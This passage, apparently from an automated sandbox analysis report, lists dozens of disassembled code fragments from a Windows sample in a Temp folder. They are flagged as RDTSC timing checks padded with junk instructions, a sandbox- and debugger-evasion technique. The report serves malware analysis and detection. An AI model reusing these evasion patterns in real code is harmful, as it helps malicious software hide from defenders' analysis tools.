0x0000007f je 00007F742CC44206h 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CE38 second address: 47CE42 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480BC8 second address: 480BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D389Eh] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 adc dx, 072Fh 0x00000017 cmc 0x00000018 popad 0x00000019 push eax 0x0000001a push esi 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847A4 second address: 4847A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847A8 second address: 4847AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847AC second address: 4847B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847B2 second address: 4847CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CC44211h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E609 second address: 48E60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E60D second address: 48E634 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F742CC44212h 0x0000000c jmp 00007F742CC4420Dh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A436 second address: 41A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A43C second address: 41A440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A440 second address: 41A449 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A449 second address: 41A451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48DE14 second address: 48DE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E0FB second address: 48E0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E0FF second address: 48E124 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F742CEB81CCh 0x0000000c jo 00007F742CEB81C6h 0x00000012 jmp 00007F742CEB81CCh 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E124 second address: 48E146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F742CC44217h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E146 second address: 48E14C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E14C second address: 48E162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F742CC4420Ch 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E162 second address: 48E166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E166 second address: 48E16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 490A70 second address: 490A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 490A76 second address: 490A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 490A7E second address: 490A87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 494F0F second address: 494F37 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F742CC44212h 0x00000008 jmp 00007F742CC4420Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F742CC4420Ah 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 427B5E second address: 427B78 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F742CEB81CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F742CEB81CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480D55 second address: 480D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480D59 second address: 480D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480D5F second address: 480D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 499F7E second address: 499F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 499F85 second address: 499F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 499F8B second address: 499FA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F742CEB81D0h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A23E second address: 49A242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A3DF second address: 49A404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F742CEB81C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A404 second address: 49A408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A408 second address: 49A40E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A582 second address: 49A587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A814 second address: 49A82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A9BB second address: 49A9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A9C6 second address: 49A9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F742CEB81D2h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A9E6 second address: 49A9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF5F second address: 42AF65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF65 second address: 42AF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF6B second address: 42AF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81CCh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF7D second address: 42AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A0733 second address: 4A073D instructions: 0x00000000 rdtsc 0x00000002 je 00007F742CEB81C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A3B94 second address: 4A3B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A3B9A second address: 4A3BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A3BA0 second address: 4A3BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A80CE second address: 4A80FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81CCh 0x00000009 jmp 00007F742CEB81D8h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A80FC second address: 4A8107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F742CC44206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A82AE second address: 4A82B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A83E5 second address: 4A83E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8541 second address: 4A854B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F742CEB81C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A86E1 second address: 4A86E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A86E7 second address: 4A86EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A888F second address: 4A88B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007F742CC44206h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jbe 00007F742CC44206h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F742CC44206h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A88B3 second address: 4A88EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F742CEB81DAh 0x0000000e jbe 00007F742CEB81C6h 0x00000014 jmp 00007F742CEB81CEh 0x00000019 jmp 00007F742CEB81D3h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8A67 second address: 4A8A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8A74 second address: 4A8A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8BF6 second address: 4A8BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D4B second address: 4A8D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D52 second address: 4A8D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CC4420Ch 0x00000010 pushad 0x00000011 jl 00007F742CC44206h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D72 second address: 4A8D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D77 second address: 4A8D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D8B second address: 4A8D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D8F second address: 4A8D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8EEE second address: 4A8EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A9196 second address: 4A91B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F742CC44212h 0x0000000b jc 00007F742CC44206h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A91B5 second address: 4A91BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42E5A1 second address: 42E5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44217h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7DED second address: 4A7DF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7DF9 second address: 4A7DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7DFD second address: 4A7E07 instructions: 0x00000000 rdtsc 0x00000002 js 00007F742CEB81C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7E07 second address: 4A7E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADF83 second address: 4ADF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADF87 second address: 4ADF8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE0F5 second address: 4AE0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE0FE second address: 4AE102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE102 second address: 4AE12D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jl 00007F742CEB8213h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F742CEB81C6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE12D second address: 4AE146 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Ch 0x00000007 jp 00007F742CC44206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE6F7 second address: 4AE721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81CAh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F742CEB81D7h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE721 second address: 4AE727 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE727 second address: 4AE749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F742CEB81FBh 0x0000000f jc 00007F742CEB81DFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADC7D second address: 4ADC83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADC83 second address: 4ADC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADC89 second address: 4ADC92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA73 second address: 4AEA7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA7D second address: 4AEA87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F742CC44206h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA87 second address: 4AEA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA8B second address: 4AEA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jno 00007F742CC44206h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA9D second address: 4AEAA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEAA2 second address: 4AEAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44216h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEAC2 second address: 4AEAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
